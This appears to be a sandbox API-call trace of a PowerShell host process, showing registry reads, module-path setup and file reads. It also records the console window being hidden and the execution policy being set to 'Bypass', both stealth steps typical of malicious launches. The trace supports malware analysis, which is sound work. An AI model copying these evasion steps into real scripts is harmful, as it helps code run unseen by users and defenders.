	[0109.122] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0109.122] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0109.122] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.793] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.793] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.793] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.793] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0136.645] GetConsoleWindow () returned 0x30234
	[0136.647] ShowWindow (hWnd=0x30234, nCmdShow=0) returned 0
	[0136.649] CoTaskMemAlloc (cb=0x104) returned 0x2358c0
	[0136.649] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2358c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0136.649] CoTaskMemFree (pv=0x2358c0) 
	[0136.905] SetEnvironmentVariableW (lpName="PSExecutionPolicyPreference", lpValue="Bypass") returned 1
	[0136.939] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1c4
	[0136.952] CoCreateGuid (in: pguid=0x18d980 | out: pguid=0x18d980*(Data1=0xc337d35e, Data2=0x90bf, Data3=0x43bb, Data4=([0]=0x8b, [1]=0x68, [2]=0xd4, [3]=0x4a, [4]=0xb2, [5]=0xfb, [6]=0xed, [7]=0xb9))) returned 0x0
	[0136.953] CoTaskMemAlloc (cb=0x104) returned 0x2358c0
	[0136.953] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2358c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0136.953] CoTaskMemFree (pv=0x2358c0) 
	[0141.490] CoTaskMemAlloc (cb=0xcc) returned 0x1b921330
	[0141.490] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b921330, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0141.490] CoTaskMemFree (pv=0x1b921330) 
	[0141.490] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d4f8 | out: phkResult=0x18d4f8*=0x2e8) returned 0x0
	[0141.490] RegQueryValueExW (in: hKey=0x2e8, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x18d47c, lpData=0x0, lpcbData=0x18d478*=0x0 | out: lpType=0x18d47c*=0x2, lpData=0x0, lpcbData=0x18d478*=0x6c) returned 0x0
	[0141.490] CoTaskMemAlloc (cb=0x70) returned 0x21f100
	[0141.490] RegQueryValueExW (in: hKey=0x2e8, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x18d44c, lpData=0x21f100, lpcbData=0x18d448*=0x6c | out: lpType=0x18d44c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x18d448*=0x6c) returned 0x0
	[0141.490] CoTaskMemFree (pv=0x21f100) 
	[0141.490] CoTaskMemAlloc (cb=0xcc) returned 0x1b921330
	[0141.490] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x1b921330, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0141.490] CoTaskMemFree (pv=0x1b921330) 
	[0141.490] CoTaskMemAlloc (cb=0xcc) returned 0x1b921330
	[0141.490] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b921330, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0141.490] CoTaskMemFree (pv=0x1b921330) 
	[0141.494] RegCloseKey (hKey=0x2e8) returned 0x0
	[0141.494] CoTaskMemAlloc (cb=0xcc) returned 0x1b921330
	[0141.494] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b921330, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0141.494] CoTaskMemFree (pv=0x1b921330) 
	[0141.494] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d4f8 | out: phkResult=0x18d4f8*=0x2e8) returned 0x0
	[0141.494] RegQueryValueExW (in: hKey=0x2e8, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x18d47c, lpData=0x0, lpcbData=0x18d478*=0x0 | out: lpType=0x18d47c*=0x0, lpData=0x0, lpcbData=0x18d478*=0x0) returned 0x2
	[0141.494] RegCloseKey (hKey=0x2e8) returned 0x0
	[0144.880] CoTaskMemAlloc (cb=0x20c) returned 0x1b917dd0
	[0144.880] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b917dd0 | out: pszPath="C:\\Users\\aETAdzjz\\Documents") returned 0x0
	[0144.881] CoTaskMemFree (pv=0x1b917dd0) 
	[0144.881] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x18d080, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0144.881] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0145.166] CoTaskMemAlloc (cb=0x104) returned 0x2358c0
	[0145.166] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2358c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0145.167] CoTaskMemFree (pv=0x2358c0) 
	[0145.169] CoTaskMemAlloc (cb=0x104) returned 0x2358c0
	[0145.169] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2358c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0145.169] CoTaskMemFree (pv=0x2358c0) 
	[0146.752] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x334
	[0146.753] GetFileType (hFile=0x334) returned 0x1
	[0146.753] SetErrorMode (uMode=0x1) returned 0x1
	[0146.753] GetFileType (hFile=0x334) returned 0x1
	[0148.350] VirtualQuery (in: lpAddress=0x18be40, lpBuffer=0x18cd00, dwLength=0x30 | out: lpBuffer=0x18cd00*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0149.618] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x18cb70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0149.618] SetErrorMode (uMode=0x1) returned 0x1
	[0149.619] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x15c
	[0149.619] GetFileType (hFile=0x15c) returned 0x1
	[0149.619] SetErrorMode (uMode=0x1) returned 0x1
	[0149.619] GetFileType (hFile=0x15c) returned 0x1
	[0149.619] ReadFile (in: hFile=0x15c, lpBuffer=0x2f4e768, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2f4e768*, lpNumberOfBytesRead=0x18d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0149.632] ReadFile (in: hFile=0x15c, lpBuffer=0x2db1950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2db1950*, lpNumberOfBytesRead=0x18d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0149.632] ReadFile (in: hFile=0x15c, lpBuffer=0x2db1950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2db1950*, lpNumberOfBytesRead=0x18d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0149.632] ReadFile (in: hFile=0x15c, lpBuffer=0x2db1950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2db1950*, lpNumberOfBytesRead=0x18d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0149.632] ReadFile (in: hFile=0x15c, lpBuffer=0x2db1950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2db1950*, lpNumberOfBytesRead=0x18d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0149.633] ReadFile (in: hFile=0x15c, lpBuffer=0x2db1950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2db1950*, lpNumberOfBytesRead=0x18d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0149.633] ReadFile (in: hFile=0x15c, lpBuffer=0x2db1950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2db1950*, lpNumberOfBytesRead=0x18d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0149.633] ReadFile (in: hFile=0x15c, lpBuffer=0x2db1950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2db1950*, lpNumberOfBytesRead=0x18d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0149.633] ReadFile (in: hFile=0x15c, lpBuffer=0x2db1950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2db1950*, lpNumberOfBytesRead=0x18d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0149.635] ReadFile (in: hFile=0x15c, lpBuffer=0x2db1950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2db1950*, lpNumberOfBytesRead=0x18d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0149.635] ReadFile (in: hFile=0x15c, lpBuffer=0x2db1950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2db1950*, lpNumberOfBytesRead=0x18d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0149.635] ReadFile (in: hFile=0x15c, lpBuffer=0x2db1950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2db1950*, lpNumberOfBytesRead=0x18d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0149.636] ReadFile (in: hFile=0x15c, lpBuffer=0x2db1950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2db1950*, lpNumberOfBytesRead=0x18d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0149.636] ReadFile (in: hFile=0x15c, lpBuffer=0x2db1950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2db1950*, lpNumberOfBytesRead=0x18d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0149.636] ReadFile (in: hFile=0x15c, lpBuffer=0x2db1950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2db1950*, lpNumberOfBytesRead=0x18d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0149.949] ReadFile (in: hFile=0x15c, lpBuffer=0x2db1950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2db1950*, lpNumberOfBytesRead=0x18d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0149.950] ReadFile (in: hFile=0x15c, lpBuffer=0x2db1950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2db1950*, lpNumberOfBytesRead=0x18d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0149.952] ReadFile (in: hFile=0x15c, lpBuffer=0x2db1950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2db1950*, lpNumberOfBytesRead=0x18d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0149.953] ReadFile (in: hFile=0x15c, lpBuffer=0x2db1950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2db1950*, lpNumberOfBytesRead=0x18d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0149.953] ReadFile (in: hFile=0x15c, lpBuffer=0x2db1950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2db1950*, lpNumberOfBytesRead=0x18d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0149.953] ReadFile (in: hFile=0x15c, lpBuffer=0x2db1950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2db1950*, lpNumberOfBytesRead=0x18d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0149.953] ReadFile (in: hFile=0x15c, lpBuffer=0x2db1950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2db1950*, lpNumberOfBytesRead=0x18d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0149.954] ReadFile (in: hFile=0x15c, lpBuffer=0x2db1950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2db1950*, lpNumberOfBytesRead=0x18d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0149.954] ReadFile (in: hFile=0x15c, lpBuffer=0x2db1950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2db1950*, lpNumberOfBytesRead=0x18d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0149.954] ReadFile (in: hFile=0x15c, lpBuffer=0x2db1950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2db1950*, lpNumberOfBytesRead=0x18d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0149.954] ReadFile (in: hFile=0x15c, lpBuffer=0x2db1950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2db1950*, lpNumberOfBytesRead=0x18d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0149.955] ReadFile (in: hFile=0x15c, lpBuffer=0x2db1950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2db1950*, lpNumberOfBytesRead=0x18d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0149.955] ReadFile (in: hFile=0x15c, lpBuffer=0x2db1950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2db1950*, lpNumberOfBytesRead=0x18d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0149.955] ReadFile (in: hFile=0x15c, lpBuffer=0x2db1950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2db1950*, lpNumberOfBytesRead=0x18d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0149.955] ReadFile (in: hFile=0x15c, lpBuffer=0x2db1950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2db1950*, lpNumberOfBytesRead=0x18d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0149.956] ReadFile (in: hFile=0x15c, lpBuffer=0x2db1950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2db1950*, lpNumberOfBytesRead=0x18d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0149.956] ReadFile (in: hFile=0x15c, lpBuffer=0x2db1950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2db1950*, lpNumberOfBytesRead=0x18d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0149.956] ReadFile (in: hFile=0x15c, lpBuffer=0x2db1950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2db1950*, lpNumberOfBytesRead=0x18d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0149.961] ReadFile (in: hFile=0x15c, lpBuffer=0x2db1950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2db1950*, lpNumberOfBytesRead=0x18d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0149.961] ReadFile (in: hFile=0x15c, lpBuffer=0x2db1950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2db1950*, lpNumberOfBytesRead=0x18d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0149.961] ReadFile (in: hFile=0x15c, lpBuffer=0x2db1950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2db1950*, lpNumberOfBytesRead=0x18d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0149.962] ReadFile (in: hFile=0x15c, lpBuffer=0x2db1950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2db1950*, lpNumberOfBytesRead=0x18d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0149.962] ReadFile (in: hFile=0x15c, lpBuffer=0x2db1950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2db1950*, lpNumberOfBytesRead=0x18d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0149.962] ReadFile (in: hFile=0x15c, lpBuffer=0x2db1950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2db1950*, lpNumberOfBytesRead=0x18d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0149.962] ReadFile (in: hFile=0x15c, lpBuffer=0x2db1950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2db1950*, lpNumberOfBytesRead=0x18d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0149.963] ReadFile (in: hFile=0x15c, lpBuffer=0x2db1950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2db1950*, lpNumberOfBytesRead=0x18d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0149.963] ReadFile (in: hFile=0x15c, lpBuffer=0x2db1950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2db1950*, lpNumberOfBytesRead=0x18d0f8*=0x1b4, lpOverlapped=0x0) returned 1
	[0149.963] ReadFile (in: hFile=0x15c, lpBuffer=0x2db1950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2db1950*, lpNumberOfBytesRead=0x18d0f8*=0x0, lpOverlapped=0x0) returned 1
	[0149.963] CloseHandle (hObject=0x15c) returned 1
	[0149.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x18ce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0149.963] SetErrorMode (uMode=0x1) returned 0x1
	[0149.963] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x18d070 | out: lpFileInformation=0x18d070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0149.964] SetErrorMode (uMode=0x1) returned 0x1
	[0149.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x18cda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0149.964] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d158 | out: phkResult=0x18d158*=0x15c) returned 0x0
	[0149.964] RegQueryValueExW (in: hKey=0x15c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18d0dc, lpData=0x0, lpcbData=0x18d0d8*=0x0 | out: lpType=0x18d0dc*=0x1, lpData=0x0, lpcbData=0x18d0d8*=0x56) returned 0x0
	[0149.964] CoTaskMemAlloc (cb=0x5a) returned 0x283e00
